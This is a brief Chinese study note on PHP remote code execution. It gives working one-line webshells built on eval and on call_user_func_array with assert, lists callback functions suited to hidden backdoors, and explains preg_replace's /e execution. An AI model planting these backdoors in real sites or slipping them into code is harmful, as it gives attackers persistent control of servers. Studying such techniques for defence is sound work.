RCE随笔(1)

哪些是可以执行代码执行:php代码。

eval

如:eval:<?php eval($_post['key']);

eval:php中不被叫做函数叫动态执行命令

assert:执行函数

call_user_func_array

<?php call_user_func_array('assert',array($_REQUEST['shu']));

传入xxs-labs/test.php?shu=phpinfo();

回调回门(用于留后门的,方便下次渗透):

回调后门的闭住:call_user_func()

call_user_func_array()

call_user_func

array_filter

arrya_map

uasort、uksort、array_walk、array_walk_recursive

preg_replace

当匹配的格式有**|e**的时候匹配到的字符会投到eval里面执行

哪些是可以执行命令:服务器的命令。

相关推荐
大筒木老辈子30 分钟前
Git笔记---其他常用操作
笔记·git
做cv的小昊1 小时前
科研论文PPT绘图技巧:绘制任意曲线三角形(胖三角形)并制作效果对比图
经验分享·笔记·学习·微软·ai绘画·数据可视化
霖002 小时前
ZYNQ——ultra scale+ IP 核详解与配置
服务器·开发语言·网络·笔记·网络协议·tcp/ip
谅望者2 小时前
数据分析笔记10:数据容器
笔记·数据挖掘·数据分析
谅望者2 小时前
数据分析笔记05:区间估计
笔记·数据挖掘·数据分析
@游子3 小时前
内网渗透笔记-Day2
笔记
河铃旅鹿3 小时前
Android开发-java版:SQLite数据库
android·数据库·笔记·学习·sqlite
optimistic_chen4 小时前
【Java EE进阶 --- SpringBoot】AOP原理
spring boot·笔记·后端·java-ee·开源·aop
AA陈超5 小时前
UE5笔记:OnComponentBeginOverlap
c++·笔记·学习·ue5·虚幻引擎
培风图楠6 小时前
Java个人学习笔记
java·笔记·学习